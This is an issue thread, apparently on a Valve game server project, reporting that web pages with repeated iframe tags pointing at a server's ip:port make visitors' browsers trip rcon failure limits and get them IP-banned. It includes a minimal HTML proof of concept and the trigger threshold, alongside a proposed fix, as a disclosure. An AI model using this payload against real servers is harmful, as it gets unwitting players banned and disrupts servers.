Open Thordin opened 10 years ago
alfred-valve
commented
10 years ago Can you post some more details please, for example the whole HTML page in question and how exactly you cause the issue. I assume you are saying that the user loads this in their browser of choice?
Thordin
commented
10 years ago The person who used it against us had a webpage with a screenshot on it. Inside the html he embedded many iframe tags referrring to our server.
You could probably also use img tags but the person who used this against us used iframe tags.
This is probably the minimal webpage needed. I think 3 is the minimum required to trigger an rcon ban but it could be more depending on your settings.
<html>
<iframe src="1.2.3.4:27015"></iframe>
<iframe src="1.2.3.4:27015"></iframe>
<iframe src="1.2.3.4:27015"></iframe>
</html>
It-s-Me
commented
10 years ago You also need to include http:// before the ip:port. Such as:
<iframe src="http://ip:port"></iframe>
I tested this, as well, by creating an html file with the line above repeated 6 times with my server ip:port, which successfully IP banned me. It usually takes 6 times because the default for sv_rcon_minfailures is set to 5.
You can also simply open up your web browser and put in http://ip:port, then hit refresh 5 times and get IP banned.
I reported this exploit to a Valve employee about 2 months ago and it hasn't been fixed yet.
This exploit allows you to permanently ban people from a server until reboot simply by visiting a webpage. The server interprets these requests as an rcon request and permanently bans them
To fix this, ignore packets that don't follow the rcon protocol.